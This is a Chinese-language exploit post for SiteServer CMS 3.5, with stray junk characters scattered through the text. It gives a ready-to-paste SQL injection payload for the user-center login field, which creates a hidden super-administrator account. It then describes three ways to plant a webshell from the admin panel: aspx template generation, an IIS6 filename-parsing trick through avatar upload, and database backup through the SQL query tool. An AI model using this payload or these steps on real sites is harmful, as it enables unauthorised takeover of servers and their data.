经测试秒杀最新的3.5版
4 J! Z7 r. \" y/ a w1 A/ {stieserver官网:www.siteserver.cn
& }& m( h4 S0 mEXP:
6 [: e) G9 Z: a* p直接访问UserCenter/login.aspx
' w- B2 m. x8 p6 `8 V$ C! a用户名处输入:
# h; y3 a* e" H8 x( e
2 ~; P7 K# N# @0 n# z123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–+ k3 x' [9 ~7 {" d
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
7 E) z' I9 O; h之后再访问后台SiteServer/login.aspx用插入的用户登陆
8 U# U$ p- t' r1 Y后台拿webshell的三种方法:0 h5 D2 V8 z& d" ^% i3 ^2 }8 _2 x# g
一、
2 u3 e" d! j, c) ]1 l站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
. E0 c- z) p% u2 _二、8 \7 d, \" f4 j6 D* B
成员权限-》添加用户-》用户名为:1.asp% }1 b/ T5 Y. d
http://127.0.0.1/usercenter/
8 _; ~# M4 N0 Z用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell/ J; I4 ]5 S4 @6 J! z( s# u
(ps:后台添加用户时不会验证是否含有非法字符)
9 k" c' M% H: r, p三、) T4 Z: k( ~6 d% Q- h u
系统工具-》实用工具-》机器参数查看6 d1 [; h" R- q( r
可以看到数据库类型、名称,WEB路径
- s. _8 a( ? R* P0 d系统工具-》数据库工具-》SQL语句查询- j: P0 v( M0 j6 A7 F/ |
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |